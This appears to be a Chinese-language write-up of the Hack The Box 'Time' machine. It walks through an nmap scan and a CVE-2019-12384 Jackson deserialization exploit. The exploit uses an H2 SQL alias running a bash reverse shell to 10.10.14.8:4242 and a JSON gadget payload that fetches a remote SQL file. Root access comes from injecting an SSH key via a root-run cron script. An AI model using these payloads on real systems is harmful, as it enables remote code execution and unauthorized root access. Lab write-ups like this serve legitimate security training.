HTB time 10.10.10.214

sudo nmap -sS -Pn -p 1433,445,135,5985,3389,22,1521,3306,6379,5432,389,25,110,143,443,5900,21,873,27017,23,3690,1099,5984,5632,3389,80-100,7000-10000,13389,13306,11433,18080 -n --open --min-hostgroup 1024 --min-parallelism 1024 --host-timeout 30 -T4 -v 10.10.10.214

Warning: You specified a highly aggressive --min-hostgroup.
Warning: Your --min-parallelism option is pretty high!  This can hurt reliability.
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-10 13:13 CST
WARNING: Duplicate port number(s) specified.  Are you alert enough to be using Nmap?  Have some coffee or Jolt(tm).
Initiating SYN Stealth Scan at 13:13
Scanning 10.10.10.214 [3050 ports]
Discovered open port 22/tcp on 10.10.10.214
Discovered open port 80/tcp on 10.10.10.214
Completed SYN Stealth Scan at 13:13, 1.98s elapsed (3050 total ports)
Nmap scan report for 10.10.10.214
Host is up (0.20s latency).
Not shown: 3048 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.05 seconds
           Raw packets sent: 3051 (134.244KB) | Rcvd: 3050 (122.008KB)

vim /etc/hosts

10.10.10.214 time.htb

firefox time.htb

打开之后的页面，然后有两个选择，我在输入框当中输入了xss命令@ @ <script>alert(1234)</script>

返回了报错Validation failed: Unhandled Java exception: com.fasterxml.jackson.core.JsonParseException: Unexpected character ('<' (code 60)): expected a valid value (number, String, array, object, 'true', 'false' or 'null')

标红的地方是java的函数，没有其他利用的点，只能查查这个函数有没有CVE了。

巨多，CVE-2019-12384具体指出了fasterXML，就它了。

github search CVE-2019-12384

　　1、python -m http.server web服务

　　2、写一个sql文件

　　

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
        String[] command = {"bash", "-c", cmd};
        java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\A");
        return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('bash -i >& /dev/tcp/10.10.14.8/4242 0>&1')

 　　3、nc -lvnp 4242 开启一个监听端口

　　4、Validate（beta！）输入语句从web服务下载加载sql文件

["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.8:8000/inject.sql'"}]"

 

连接成功之后直接到家目录下面拿flag值。（user flag）

然后上传linpeas看看有没有可以提权的办法。（虽然显示是ubuntu使用了最新的sudo提权CVE，但是失败了，没有任何卵用）

直接运行显示没有权限，chmod +x 赋予执行权限。

运行了linpeas行数显示不够，在终端当中设置History size

linpeas显示ROOT权限每分钟会运行一次脚本timer_backup.sh

查看一下.ssh目录下有没有ssh key

没有使用命令

ssh-keygen -rsa一直确认生成sshkey

然后将语句

echo ssh-rsa ssh.key  >>/root/.ssh/authorized_keys

 #ssh.key 是指具体的SSH.key并非字面上的ssh.key

写入到脚本timer_backup.sh当中

time会用ROOT权限运行timer_backup.sh脚本将ssh.key写入到timeSSHRoot权限当中，然后使用ssh连接time的ROOT用户，读取root flag。

远控木马：https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Reverse Shell Cheatsheet.md

CVE-2019-12384：https://github.com/jas502n/CVE-2019-12384